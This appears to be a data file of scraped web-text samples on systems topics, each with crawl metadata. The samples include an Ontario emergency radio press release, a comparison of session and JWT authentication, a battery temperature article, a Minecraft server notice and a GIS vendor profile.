Premier Doug Ford was flanked by local firefighters last Thursday while announcing new measures that will increase public safety. Joined by Simcoe-Grey MPP Jim Wilson, Mr. Ford announced a significant province-wide modernization project that will replace infrastructure in Ontario's Public Safety Radio Network, a resource which frontline and first responders rely on during emergency situations.
"This modernization project is long overdue," said Premier Ford. "Our frontline and emergency responders need to have reliable, modern tools and resources in place to do their jobs and we are going to make sure this life-saving system gets underway."
This multi-faceted project will ensure Ontario's more than 38,000 frontline and emergency responders — including OPP police officers, paramedics and hospital staff, fire services, provincial highway maintenance staff, as well as enforcement and correctional officers — can count on the communications infrastructure, network and equipment they need when responding to emergencies.
"Ontario's Public Safety Radio Network is one of the largest and most complex in North America and yet one of the last not to comply with the North American standard," said Michael Tibollo, Minister of Community Safety and Correctional Services. "The daily service outages experienced with the network compromise our frontline and emergency responders' ability to react to emergencies and put the safety of the public at risk."
The modernization project will:
- Rebuild the network's aging infrastructure (telecommunications towers, antennae, shelters and technology) that provides essential public safety radio coverage across the province
- Provide frontline and emergency responders, as well as their dispatchers, with the state-of-the-art radio equipment and consoles they need to manage calls and ensure the right responders get to the right place with the right information at the right time
- Provide maintenance services to restore network connection and repair equipment for a duration of 15 years.
"The Public Safety Radio Network is essential to helping front-line responders communicate with each other to provide Ontarians with vital emergency services," said Christine Elliott, Minister of Health and Long-Term Care. "By replacing this aging system with state-of-the-art technology, we are providing resources to paramedics, police officers, fire services and others to keep Ontarians safe."
The new network is expected to be fully operational by 2023, with new service phased in by 2021. Infrastructure, equipment and services required to set up and maintain the new network will be acquired through a multi-vendor procurement process. The new network will also present potential opportunities for generating revenue, which will benefit taxpayers. In the meantime, a risk mitigation strategy has been developed to ensure that public safety is not compromised and that the current network is maintained until the new network is fully operational.
"The recent tornadoes experienced in Eastern Ontario prove how important it is for us to modernize our Public Safety Radio Network," said Steve Clark, Minister of Municipal Affairs and Housing. "The upgrades will help municipal first responders like paramedics, fire services and police do their important jobs better."
systems_science
https://www.career.edu.pk/courses/72-itil-foundation.html
2018-01-17T06:37:45
s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084886830.8/warc/CC-MAIN-20180117063030-20180117083030-00207.warc.gz
0.903062
204
CC-MAIN-2018-05
webtext-fineweb__CC-MAIN-2018-05__0__205658738
en
ITIL is the result of the UK government's Cabinet Office documenting a set of processes and procedures for the delivery and support of high-quality IT services, designed and managed to meet the needs of an organization. ITIL can be adopted by an organization and adapted to meet its specific needs. By completing this ITIL Foundation course, you will gain an understanding of the importance of service management, both to the IT service provider and to its customers.
- An Introduction to IT Service Management
- Service Portfolio Management
- Financial Management
- Business Relationship Management
- Service Strategy
- Service Design
  - Designing the Service Solution itself
  - Designing the service management system and tools that will be required to manage the service
  - Understanding the importance of management and technology architectures
  - Understanding the processes that will be required
  - The measurement systems, methods and metrics that will show us whether the service is working properly or not
- Service Transition
- Service Operation
- Continual Service Improvement
systems_science
http://inigopress.com/solar-express/
2019-05-19T09:11:35
s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232254731.5/warc/CC-MAIN-20190519081519-20190519103519-00287.warc.gz
0.934779
962
CC-MAIN-2019-22
webtext-fineweb__CC-MAIN-2019-22__0__199160590
en
Buzz Aldrin, one of the Apollo 11 astronauts, earned an Sc.D.. in Astronautics from MIT. He proposed use of a “Mars Cycler” to minimize transit costs between Mars and Earth. A cycler trajectory encounters two or more bodies on a periodic basis. A Mars cycler is an elliptical orbit that crosses the orbits of Earth and Mars, and encounters both planets at the points where it crosses their orbits, although not necessarily on every orbit. Aldrin identified a Mars cycler corresponding to a single synodic period. The Aldrin cycler (as it is now known) makes a single eccentric loop around the Sun. It travels from Earth to Mars in 146 days, spends the next 16 months beyond the orbit of Mars, and takes another 146 days going from Mars back to Earth. (Wikipedia) Since a cycler is in a (relatively) stable orbit, it needs (relatively) little fuel to stay on track. It can serve as a transport for humans and/or materials from Earth to Mars and vice versa. In my sci fi future Worlds of Sol the United Nations of Sol have moved mining and manufacturing off Earth into space for climate remediation. Mining extracts raw materials from asteroids. The raw materials are then transferred to factories in space. The UNS has mining/manufacturing complexes in both L4 and L5 Earth-Moon Lagrangian points. The UNS uses repurposed nuclear weapons from the 20th century Cold War to move asteroids between the Belt and either Earth or Mars on Hohmann trajectories. Mars is a waypoint to support asteroid mining as well as a terraforming project to give all humans on Earth a stake in a future in space. This world needs a lot of infrastructure to be viable. Asteroid mining and Lagrangian point manufacturing allows the UNS to create a closed cycle with minimal requirement to boost mass out of Earth’s gravity. Raw materials come from space. Manufactured goods are sent to Earth in cargo pods by decelerating the pods with electromagnetic accelerators at the factories. The pods reenter, bleed off significant speed (and energy) in the atmosphere and at the surface fly into electromagnetic linear decelerators. Only the empty pod need be sent aloft again. Or, the pod itself could be used as a cargo container for ships to transport goods from an oceanic landing complex around the world. To send manufactured goods or humans to Mars, the UNS must sent them in pods to rendezvous with the cycler. One of the major problems for humans going from Earth to Mars is radiation. Radiation shielding is heavy and thus fuel-consuming for a conventional spacecraft. There’s a lot of speculation on the Internet about building a Mars cycler and using it to allow two-way travel between Earth and Mars. It occurred to me that using an asteroid as the Mars cycler would allow (1) fantastic shielding for a crew inside, (2) the possibility of creating artificial gravity inside an asteroid by hollowing it out and spinning it and (3) the ability to send enormous amounts of bulk and weight between the two planets. The only problem is, how do you get an asteroid into a cycler orbit? My idea is to use the nuclear weapon propulsion mechanism to change the orbit of an Earth-crossing asteroid to a Mars cycler orbit. Once the asteroid is in orbit, people and/or cargo can be loaded aboard at the embarkation point and offloaded at the debarkation point. It’s necessary to accelerate the payload to the cycler orbital velocity prior to departure, join in formation on the cycler and transfer the payload to the asteroid. 
It's also necessary to decelerate the payload at the destination. If this is done with fuel aboard the rendezvous vehicle, it's necessary to bring fuel from Earth for both of these purposes. A lot of people complain that a cycler orbit takes so much delta-V to reach that the carrier vehicle might as well continue all the way to Mars. But imagine something like a 747, with people crowded in and minimal shielding, taking people or cargo to the cycler. People and cargo can be transferred inside, where the major storage and living facilities are carved out of the asteroid. The transfer vehicle need not provide much life support, artificial gravity, radiation shielding or much else. It can go back to Earth or ride along and transfer goods to Mars at the other end. The Mars cycler figures in my WiP novel Fire in the Sky, which uses a relatively flimsy cycler to go to Mars, then to the Belt, to find an asteroid for the Solar Express.
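As a rough sanity check on the Aldrin cycler figures quoted earlier (two 146-day transfer legs plus about 16 months spent beyond the orbit of Mars, repeating once per Earth-Mars synodic period), here is a small illustrative calculation. The orbital periods are standard textbook values; the rest is simple arithmetic, not a trajectory design.

```python
# Earth-Mars synodic period: how often the two planets return to the same
# relative geometry, which sets the natural repeat time for a cycler orbit.
T_EARTH = 365.25   # days
T_MARS = 686.98    # days

synodic = 1.0 / (1.0 / T_EARTH - 1.0 / T_MARS)
print(f"Synodic period: {synodic:.1f} days")        # ~779.9 days

# Subtract the two 146-day legs quoted for the Aldrin cycler; what remains
# is the stretch spent beyond the orbit of Mars.
beyond_mars = synodic - 2 * 146
print(f"Beyond Mars: {beyond_mars:.0f} days (~{beyond_mars / 30.44:.1f} months)")
```

The result, roughly 488 days or about 16 months, matches the description of the cycler spending the next 16 months beyond the orbit of Mars.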
systems_science
https://naasongs.fun/l3-network-switch-prefered_-s5300-48m6x-1/
2023-12-03T14:27:47
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100508.23/warc/CC-MAIN-20231203125921-20231203155921-00143.warc.gz
0.933626
730
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__236852672
en
The S5300-48M6X is a high-performance L3+ 10g network switch designed to meet the demands of modern enterprise-level networks. With its 216 Gbps switching capacity and 162 Mpps forwarding rate, the S5300-48M6X provides exceptional performance and reliability. It is equipped with 1+1 redundant hot-swappable power supplies and built-in 2 intelligent fans, making it an ideal solution for mission-critical applications. One of the key features of the S5300-48M6X is its support for Layer 3 functions. As a Layer 3 switch, it is capable of routing traffic between different networks, making it an essential component of any enterprise network. It supports protocols such as BGP, ECMP, and PBR, which enable it to create and manage complex network topologies with ease. The S5300-48M6X is also a 10g switch, which means it supports data transfer rates of up to 10 Gbps. This high-speed connectivity is essential for applications that require large amounts of data to be transferred quickly, such as video streaming, file sharing, and virtualization. The 10g switch also provides a higher level of network performance, enabling more users to connect simultaneously without experiencing any performance degradation. These include its low latency, which ensures that network traffic is processed quickly and efficiently, and its support for Quality of Service (QoS) features, which enable network administrators to prioritize certain types of traffic to ensure that critical applications receive the bandwidth they need. Easy to use is an essential feature for users, The S5300-48M6X is easy to manage, with both CLI command line and WEB management interfaces available. This makes it simple to configure and monitor the switch, and it can be managed remotely, which is particularly useful for large, distributed networks. The switch also supports a range of protocols and features that enhance its functionality and reliability, including MSTP, ERPS, VRRP, and ISSU. Flexible IPv6 functions are also supported, making the S5300-48M6X an ideal choice for organizations that are transitioning to IPv6. IPv6 is essential for supporting the growing number of devices that use IPv6 addresses, and it makes it easy to manage and configure IPv6 addresses and protocols. Overall, the S5300-48M6X is an excellent choice for organizations that require a high-performance, reliable, and easy-to-manage network switch. Its Layer 3 functionality, support for BGP, ECMP, and PBR, and high-speed connectivity make it ideal for modern enterprise-level networks. Finally, it is designed to be energy-efficient, with support for a range of power-saving technologies such as Energy-Efficient Ethernet (EEE) and port sleep mode. These features help to reduce power consumption and operating costs, making the switch an environmentally friendly and cost-effective solution for enterprise networks. In conclusion, the S5300-48M6X is a powerful, flexible, and reliable L3+ 10g network switch that is ideal for enterprise-level networks. Its advanced security, scalability, and high availability features, along with its energy-saving capabilities, make it an attractive choice for organizations that require a high-performance and cost-effective network switch. Overall, the S5300-48M6X is a great investment for any enterprise that wants to build a fast, reliable, and secure network infrastructure that can meet the demands of today’s data-driven world.
systems_science
https://safaldas.in/is-a-session-based-or-jwt-based-authentication-good-for-containerzied-application-using-docker/
2024-04-18T21:03:26
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817239.30/warc/CC-MAIN-20240418191007-20240418221007-00779.warc.gz
0.883374
583
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__180484950
en
Both session-based authentication and JWT-based authentication can be suitable for containerized applications using Docker. The choice between the two largely depends on your application's specific requirements, architecture, and security considerations. - In session-based authentication, the server stores session information on the server-side (usually in memory or a database) and provides a session identifier (usually stored in a cookie) to the client. - This approach requires the server to manage session state, which can be a concern in distributed or load-balanced environments. However, solutions like Redis-based session stores can help address this issue. - Session-based authentication is generally straightforward to implement, and it allows for more control over session handling, like setting session expiration and invalidating sessions easily. - Since the session information is stored on the server-side, it can be more secure than storing user data in a token on the client-side. - However, it may not be ideal for stateless microservices or serverless architectures, where maintaining session state can introduce complexities. - JSON Web Tokens (JWT) are stateless tokens that contain user information and are signed by the server. The client (usually a web browser or a mobile app) stores the token and sends it with each request to authenticate the user. - JWTs are suitable for stateless architectures, such as microservices and serverless applications, as they do not require the server to store session information. - The token's payload can contain user-related data (claims), which eliminates the need for frequent database queries to validate the user during each request. - JWTs can be a good fit for distributed systems, where each service can independently verify the token without relying on a central session store. - They are often used in conjunction with Single Sign-On (SSO) and provide better scalability for large-scale applications. In summary, both session-based and JWT-based authentication can work well in containerized applications using Docker. Consider the following factors to help make the right choice: - Application architecture: If your application follows a stateful architecture, session-based authentication might be a better fit. For stateless architectures, JWTs can be more suitable. - Security requirements: JWTs can be a good option for ensuring stateless and scalable authentication, but the security of the token itself becomes crucial. Proper token signing and validation practices are essential to prevent security issues. - Distributed environments: If your application will be deployed in a distributed environment with multiple instances, JWT-based authentication can be more convenient. Ultimately, both methods have their pros and cons, and the decision should be based on your application's specific needs and the level of security and complexity you are comfortable with.
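To make the JWT flow described above concrete, here is a minimal sketch of issuing and verifying a signed token. It assumes the PyJWT library and a shared HS256 secret purely for illustration; in a containerized deployment the secret would normally come from an environment variable or a secrets manager rather than being hard-coded, and the claims shown are only examples.

```python
import datetime
import jwt  # PyJWT

SECRET = "replace-with-a-secret-from-your-environment"  # illustrative only

def issue_token(user_id: str) -> str:
    """Create a signed, short-lived token carrying the user's identity."""
    payload = {
        "sub": user_id,
        "exp": datetime.datetime.utcnow() + datetime.timedelta(minutes=30),
    }
    return jwt.encode(payload, SECRET, algorithm="HS256")

def verify_token(token: str) -> dict:
    """Check the signature and expiry; raises a jwt exception if invalid."""
    return jwt.decode(token, SECRET, algorithms=["HS256"])

# Any container that knows the secret can verify the token on its own,
# without a shared session store - which is what makes the approach stateless.
token = issue_token("user-123")
print(verify_token(token)["sub"])  # -> user-123
```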
systems_science
http://compsoc.dur.ac.uk/content/about-compsoc/toast/
2017-03-30T16:40:46
s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218195419.89/warc/CC-MAIN-20170322212955-00171-ip-10-233-31-227.ec2.internal.warc.gz
0.960821
672
CC-MAIN-2017-13
webtext-fineweb__CC-MAIN-2017-13__0__306656613
en
The society has its own Linux server, which this page is served from. It is informally referred to as Toast, and has undergone a few transformations in its time. Toast was originally an AMD-K6 400 PC with 256 MB of RAM running the Debian distribution of GNU/Linux (Slink, Potato, Woody) on a Linux 2.4 kernel. It had 2 IDE hard drives, two 40Gb disks holding user files. It also used to have two external SCSI system disks, which died as we moved data to the new machine. It was later augmented to a more up-to-date machine with 1GB of RAM, more disk space and internal system disks. This hardware ran Woody and then Sarge. The actual spec was an AMD XP 2500+ CPU, 1GB of RAM and several hard disks. There were 40GB disks for system data and then one 120GB and another 160GB disk for user data. Wondering why the 160GB disk? Well, the old 120GB disk started to fail so we replaced it with a newer disk. From 1999-2001 Toast lived in the DSU Publications Office, Dunelm House (thanks to Dave Ellams and Jenny Radcliffe); it now lives in the machine room of the Computer Science department on the Science Site. Sometime in 2003 the AMD K6 machine's secondary hard disk controller failed, so we decided to buy new hardware. To cover the society between machines we had to run on temporary hardware. Michael Young of the ITS was very helpful with keeping the box up over this patchy period, and again helpful whilst we transplanted the install over to the new hardware. It got very messy with two Toasts, lots of broken mirrors, failing SCSI disks, broken kernel drivers, and no floppy or CD-ROM drive. It later transpired that one of the sticks of RAM had some major errors on it. It was basically dying right in front of our eyes. The case was noted for the power button being round the back, since people had a habit of turning it off whilst it lived in Dunelm House. In June 2006 things started to go wrong with Toast again. One of the user data disks mysteriously failed, one of the mirrored system disks started failing self tests, and the other fell out of the mirror altogether. Toast was becoming unreliable, and needed replacing. Luckily we were able to get DNUK to sponsor us with a new server. Nicknamed Pitta, the changeover took place on 29th November. The new (and current) specs are a Pentium 4 540 / 3.4 GHz, with 1024MB RAM and two 250GB hard drives. Its canonical name is now bylands.dur.ac.uk, and its IP is 188.8.131.52, but both compsoc.dur.ac.uk and toast.durge.org are CNAMEs to it, and are more commonly used. Mail can be received at either of these addresses, or alternatively mail can be sent to addresses [email protected]. The website is served from Toast, and can be accessed at both http://compsoc.dur.ac.uk and http://ducs.org.uk.
Last edit: Mon 15th Sep, 10:52 p.m.
systems_science
https://nelsonengineering.net/alpine-wastewater-treatment-plant/
2024-03-03T00:07:11
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476137.72/warc/CC-MAIN-20240302215752-20240303005752-00689.warc.gz
0.917109
581
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__97795216
en
The Alpine wastewater treatment plant is a membrane bioreactor (MBR) type of activated sludge facility designed to treat a maximum day flow of 0.4 MGD and be expanded to 0.8 MGD. The primary treatment facilities consist of two parallel 2 mm rotating screens with integral washer compactor and screenings bagging system, influent flow measurement, and a raw wastewater lift station. The secondary/tertiary treatment process has two flow trains each consisting of a flow equalization/anoxic/pre-aeration basin and a membrane biological reactor. The raw sewage is comingled in the anoxic basin with the mixed liquor returned by gravity from the MBR. Denitrification, removal of nitrate from the process stream, occurs when the heterotrophic bacteria convert nitrates (NO3) to nitrite and nitrogen gas as part of cellular respiration. The flow then enters a pre-aeration basin where the dissolved oxygen is increased to 2.0 mg/l with fine bubble aeration and variable speed blowers utilizing a DO probe to control the process. The wastewater is then lifted into the membrane bioreactor at a constant flow which is adjusted once per day based on influent flow. Each membrane bioreactor (MBR) contains 1600 submerged flat plate membranes that filter the mixed liquor, retaining the solids in the bioreactor and allowing the clear effluent to pass through. Each membrane unit in the MBR has integral air diffusers to furnish air for process oxygen requirements, membrane cleaning, and mixing requirements. The bioreactor can be operated at a mixed liquor suspended solids (MLSS) concentration of 8000 to 12000 mg/l. The clear effluent flows by gravity through an ultra-violet (UV) treatment process for final disinfection and is then discharged to the Snake River at Palisades Reservoir. The flat plate membranes provide greater than 6-log removal of bacteria and 4-log removal of viruses, so disinfection requirements are very low. Typical effluent has BOD5 and TSS concentration below 5 mg/l, ammonia less than 1 mg/l, nitrate less than 10 mg/l, turbidity less than 0.1 NTU, and fecal coliform non-detected. Biosolids are wasted to an aerobic digester where they are treated to meet Class B standards. The solids concentration in the digester is thickened to 3% via another submerged membrane to increase the storage capacity of the digesters. The digested biosolids are placed into a trailer mounted gravity filter that retains the solids and allows the water to pass through the filters and back to the treatment plant headworks. The biosolids at a concentration of 15% are then used at the plant site as a soil amendment or hauled to the landfill.
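For readers unfamiliar with the "log removal" figures quoted above, the short sketch below shows how a log reduction value translates into the fraction of organisms removed. The 6-log and 4-log values are the ones stated in this description; the calculation itself is just the standard definition, not plant performance data.

```python
# Log reduction value: LRV = log10(C_in / C_out), so an LRV of n means a
# fraction 1 - 10**(-n) of the incoming organisms is removed.
for label, lrv in [("bacteria (6-log)", 6), ("viruses (4-log)", 4)]:
    removed = 1 - 10 ** (-lrv)
    print(f"{label}: {removed * 100:.4f}% removed")  # 99.9999% and 99.9900%
```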
systems_science
http://batteryuniversity.com/learn/article/discharging_at_high_and_low_temperatures
2015-10-04T21:17:24
s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443736676092.10/warc/CC-MAIN-20151001215756-00121-ip-10-137-6-227.ec2.internal.warc.gz
0.910284
995
CC-MAIN-2015-40
webtext-fineweb__CC-MAIN-2015-40__0__103922248
en
Explore the limitations when operating a battery at adverse temperatures and learn how to minimize the effects. Like humans, batteries function best at room temperature, and any deviation from the comfort zone changes performance and/or longevity. While operating a battery at elevated temperatures momentarily improves performance by lowering the internal resistance and speeding up the chemical metabolism, such a condition shortens service life. Some manufacturers of lead acid batteries make use of improved performance at warmer temperatures and specify the batteries at a toasty 27°C (80°F). Cold temperature increases the internal resistance and lowers the capacity. Batteries that would provide 100 percent capacity at 27°C (80°F) will typically deliver only 50 percent at –18°C (0°F). The capacity decrease is momentary and the level of decline is related to the battery chemistry. Li-ion also performs better when warm. Heat lowers the internal resistance but this stresses the battery. Warming a dying flashlight or cellular phone battery in your jeans might provide additional runtime due to better energy delivery. As all drivers in cold countries know, a warm battery cranks the car engine easier than a cold one. The dry solid-polymer battery requires a temperature of 60–100°C (140– 212°F) to promote ion flow and get conductive. This type of battery has found a niche market for stationary power applications in hot climates where heat serves as a catalyst rather than a disadvantage. Built-in heating elements keep the battery operational at all times. High battery cost and safety concerns have limited the application of this system. The more common lithium-polymer uses moist electrolyte to enhance conductivity. All batteries achieve optimum service life if used at 20°C (68°F) or slightly below. If, for example, a battery operates at 30°C (86°F) instead of a more moderate room temperature, the cycle life is reduced by 20 percent. At 40°C (104°F), the loss jumps to a whopping 40 percent, and if charged and discharged at 45°C (113°F), the cycle life is only half of what can be expected if used at 20°C (68°F). (See also BU-808: How to Prolong Lithium-based Batteries.) The performance of all battery chemistries drops drastically at low temperatures. At –20°C (–4°F) most nickel-, lead- and lithium-based batteries stop functioning. Although NiCd can go down to –40°C (-40°F), the permissible discharge is only 0.2C (5-hour rate). Specialty Li- ion can operate to a temperature of –40°C, but only at a reduced discharge; charging at this temperature is out of question. With lead acid there is the danger of the electrolyte freezing, which can crack the enclosure. Lead acid freezes more easily with a low charge when the specific gravity of the electrolyte is more like water than when fully charged. Cell matching by using cells of similar capacity plays an important role when discharging at low temperature under heavy load. Since the cells in a battery pack can never be perfectly matched, a negative voltage potential can occur across a weaker cell on a multi-cell pack if the discharge is allowed to continue beyond a safe cut-off point. Known as cell reversal, the weak cell will get damaged to the point of developing a permanent electrical short. The larger the cell-count, the greater the likelihood of cell-reversal is under load. Over-discharge at a heavy load at a low temperature is also a large contributor to battery failure of cordless power tools, especially nickel-based packs. 
(See BU-803: Can Batteries be Restored? Go to Cell Mismatch, Balancing.) Users of electric vehicles must understand that the driving distance between charges is calculated under normal temperature; frigid cold temperatures will reduce the available mileage. Using battery electricity to heat the cabin is not the only reason for reduced driving distance; the battery does not perform well when cold but it will recuperate when warm.
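To illustrate the cycle-life figures quoted above (a 20 percent loss at 30°C, 40 percent at 40°C, and roughly half the expected life at 45°C, all relative to use at 20°C), here is a small sketch that interpolates between those stated points. The linear interpolation is purely an illustration of the article's numbers, not a battery model.

```python
# Cycle-life loss versus operating temperature, using only the data points
# stated in the article (lithium-based chemistry, relative to use at 20°C).
POINTS = [(20, 0), (30, 20), (40, 40), (45, 50)]  # (°C, % cycle-life loss)

def cycle_life_loss(temp_c: float) -> float:
    """Linearly interpolate the stated figures; clamp outside the range."""
    if temp_c <= POINTS[0][0]:
        return float(POINTS[0][1])
    if temp_c >= POINTS[-1][0]:
        return float(POINTS[-1][1])
    for (t0, l0), (t1, l1) in zip(POINTS, POINTS[1:]):
        if t0 <= temp_c <= t1:
            return l0 + (l1 - l0) * (temp_c - t0) / (t1 - t0)

print(cycle_life_loss(35))  # -> 30.0, midway between the 30°C and 40°C figures
```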
systems_science
http://play.pandacraft.org/forum/view_topic/?tid=367
2018-01-17T12:46:35
s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084886939.10/warc/CC-MAIN-20180117122304-20180117142304-00137.warc.gz
0.944907
912
CC-MAIN-2018-05
webtext-fineweb__CC-MAIN-2018-05__0__230130817
en
PandaCraft Skyblock will be switching away from the old pipe system completely on April 13th. The old pipe system is the one that involves using glass blocks and pistons, along with redstone clocks, to create a pipe to transfer items. On April 13th, I will remove that system so it will no longer function. If you have pipes on your island, be sure to replace them with the new Cargo Network system before then if you want your item transport systems to continue to function.

Watch this video for a tutorial on the new Cargo Networks:

There's also a small example at Spawn, which you can teleport to with the command "/warp ex", that showcases the Cargo Network in action. There's a hopper that you can throw items or blocks into. Some blocks will be placed by the Placer and then broken by the Miner, and everything else gets spit back out by a Dropper, so you'll get your items back. It demonstrates how you can use the Cargo Network to send different items to different places with Whitelists or Channels, and that the new Cargo Nodes can activate my custom Machines, like Placers, Miners, Crafters, etc.

So, why are we replacing the old pipe system? A few reasons:
- The old system needed Redstone Clocks to operate. This creates extra work for the server as redstone clocks can be notoriously laggy. The new system doesn't need any redstone to operate.
- The old system required separate colored pipes to transport items to different places. This means more pipe calculations need to be done and more redstone clocks need to be used. The new system uses built-in channels, whitelists, and blacklists to accomplish the same thing with just one single Network.
- The old system wasn't compatible with my custom machines and I had no way to make it compatible. This means you had to pipe into hoppers connected to my machines to activate them. The new system has code in place I was able to use to make my machines compatible with it, meaning the Cargo Nodes can activate my machines without any hoppers involved. Hoppers are also notorious for causing lag and islands have a limit of 100 hoppers, so using fewer hoppers on the machines is a win-win.
- The old system was very limited in what you could do with pipes. The new system gives you many options, like round-robin mode to equally distribute items, whitelists, blacklists, channels, and the ability to check items' lore or data values.
- The old system took up a lot of space on the islands. As cool as it looks having multiple colored pipes running everywhere, it can be tedious to work around them and reconfigure them. The new system is "wireless", requiring only the placement of Nodes which can interact with each other through blocks, so you can run a Network right through a wall without needing to break a hole in it. You can even hide the particles that display the connections between the Nodes by right-clicking on the Cargo Manager.
- Performance. As previously mentioned, clocks and hoppers can cause lag. With multiple old pipes on each island, clocks at every input piston, and hoppers on machines, the pipes can quickly eat away at the server's performance. Redstone clocks have to be processed by the server, and many plugins also listen to that same data even if they don't need it, so those plugins then cause even more lag. It's easy to accidentally place a pipe next to a glass wall or create an infinite loop of pipes, which causes them to do a lot of extra calculations they don't need. The new system is significantly more stable and performant.
Here are some graphs to help visualize the difference:
Performance with Pipes:
Performance with Cargo Networks:
Orange = lag. Green = Server TPS.

There is currently one main caveat with the new system, which I will fix as soon as possible. The new system is currently unable to interface properly with Furnaces, meaning you will have to use hoppers on your furnaces and feed into the hoppers using Cargo Nodes. This ensures the items go into the appropriate furnace slots. Otherwise, you may end up putting items into, or pulling out of, the wrong slots. Again, I will fix this as soon as I can.

So, make sure you get those pipes replaced by April 13th!
systems_science
http://dornsife-blogs.usc.edu/wrigley/?m=201807&paged=2
2020-05-25T19:49:37
s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347389355.2/warc/CC-MAIN-20200525192537-20200525222537-00360.warc.gz
0.943015
643
CC-MAIN-2020-24
webtext-fineweb__CC-MAIN-2020-24__0__189269358
en
By: Andrew Q. Pham

Hey everyone! I am a rising undergraduate junior in the Lab for Autonomous and Intelligent Robotics (LAIR) at Harvey Mudd College. My lab mainly works on multi-robot systems and their applications in the field. Many modern-day tasks that humans must perform can be dangerous, time-consuming, and/or mundane. One goal of robotics is to alleviate this burden, and oftentimes make the tasks more efficient. My project is attempting to make acquiring video footage of sharks easier and less time-consuming. The project is in collaboration with CSU Long Beach's Shark Lab.

Many biologists, like those at Shark Lab, use video recordings of animals in their natural habitat to study their behavior. However, tracking and monitoring sharks is a lengthy endeavor. Researchers must spend long hours (24-72 hours) on boats to acquire data. This project is specifically attempting to make this process easier by using multiple autonomous quadcopters to capture overhead footage of sharks. Most consumer grade quadcopters are incredibly nimble and small, being able to survey an area quickly. However, the tradeoff for this agility is a small battery life (about 20 minutes for the quadcopters I use). To counteract this limited battery life, a few autonomous surface vehicles (ASVs) are included in our multi-robot system. ASVs are basically autonomous boats. For this system, they function as landing platforms and recharge stations for the quadcopters. The general idea of the system is to have the quadcopters patrol over an area where the sharks are located, recording footage the entire time. The ASVs will be stationed nearby, and the quadcopters will periodically land on them to recharge.

My research specifically focuses on creating an algorithm that coordinates the motion of the quadcopters. However, what I do day-to-day varies drastically. Some days I will be working on hardware, building components for the ASV or debugging electronics. Other days I will be working on software, coding up simulations or brainstorming the math for the algorithm. Currently, I am putting the finishing touches on the system before I perform full trials. Where I do my work also varies drastically. One week I may be back at my college campus, touching base with my research advisor or gathering parts for the robots. Another week I may be back at the Wrigley Marine Science Center (WMSC) on Santa Catalina Island, deploying and testing the robots in Big Fisherman Cove. Even though the work and travel can get hectic, it is overall incredibly fun.

One thing that helped to keep this crazy amount of work manageable has been the 2018 Wrigley Summer Fellowship. The Wrigley Fellowship has been helpful for my research, giving me a place to effectively test the robots as well as a place to stay. I only have a couple weeks of my summer research left to go and a whole lot left to do. But, so far, this summer has been educational, exciting, and gone by too fast! Feel free to contact me at [email protected] if you have any further questions.
systems_science
https://myaccess.georgetown.edu/pls/bninbp/bwckctlg.p_display_courses?term_in=201730&one_subj=OPIM&sel_subj=&sel_crse_strt=250&sel_crse_end=250&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=
2018-10-22T10:23:04
s3://commoncrawl/crawl-data/CC-MAIN-2018-43/segments/1539583515029.82/warc/CC-MAIN-20181022092330-20181022113830-00048.warc.gz
0.844699
159
CC-MAIN-2018-43
webtext-fineweb__CC-MAIN-2018-43__0__228450756
en
Select the Course Number to get further detail on the course. Select the desired Schedule Type to find available classes for the course.
OPIM 250 - Mgmt Information Systems
This course prepares the student to interact with, manage within and be sensitive to the current and emerging trends in information technology. The course material will cover computer hardware and software, database management systems, telecommunications, and the systems analysis process. The course also examines the strategic importance of computing and related social and ethical issues. Computer laboratory assignments will be used to illustrate information systems concepts and applications. Formerly offered as MGMT 250.
3.000 Credit hours
3.000 Lecture hours
0.000 Lab hours
Schedule Types: Lecture
Operations & Information Mgmt Department
systems_science
https://gis.cioadvisorapac.com/vendor/geis-enabling-business-systems-with-location-intelligence-cid-979-mid-94.html
2021-07-25T08:43:33
s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046151641.83/warc/CC-MAIN-20210725080735-20210725110735-00441.warc.gz
0.937485
1,875
CC-MAIN-2021-31
webtext-fineweb__CC-MAIN-2021-31__0__149769514
en
GEIS: Enabling Business Systems With Location Intelligence
Stephen Cosgrove, Founder

The era of GIS has dawned. The word 'location' immediately brings to mind Google Maps, as it has given an entirely new dimension to geospatial intelligence and travel. Geospatial intelligence is gaining traction among enterprises for efficient asset management and tracking. It brings crucial context to a number of business aspects, from market planning to operational optimization, as it reveals patterns, connections, opportunities, and risks that are difficult to decipher otherwise. GIS is emerging from an arcane backroom operation to becoming just another data dimension in enterprise systems such as ERP and CRM. As a result, GIS is no longer treated as a special case to be managed outside the usual IT norms. Further, the commoditization of geospatial maps by players such as Google has contributed to removing GIS' "special" status.

When it comes to integration of GIS data with enterprise systems, a common issue is ensuring that all parties are referring to the same device or structure and that the nomenclature is aligned, as the operations teams typically do not have much exposure to or knowledge of the GIS system. Wherever possible, open standards, such as the Common Information Model (CIM), and open protocols, such as those administered by the Open Geospatial Consortium (OGC), should be used to allow interoperability between enterprise and GIS systems. Standards adoption is helpful when seeking to employ modern agile management techniques, including DevOps/Continuous Delivery methodologies which enforce standard pipeline and delivery practices in GIS systems.

As an expert geospatial technology integration and consultancy services provider, GEIS operates on both sides of the fence (geospatial expertise and subject-matter knowledge) to enable businesses to integrate and effectively leverage their GIS data. GEIS is a provider and integrator of geospatial and location-based software solutions that enable effective planning, management, and control of networks, assets, and resources for utilities, telecoms, and other industries. "From an integration perspective, we encourage the use of appropriate open standards such as Common Information Model (CIM) within the power distribution industry, rather than point-to-point interfaces," says Stephen Cosgrove, Founder of GEIS. The company's innovative and feature-rich products redefine institutional geospatial capacity and the scope of user adoption. "GEIS simplifies and takes the complexity out of geospatial solutions and implementations that include adding a data dimension to existing ERP systems or providing mapping data within these business solutions," says Cosgrove.

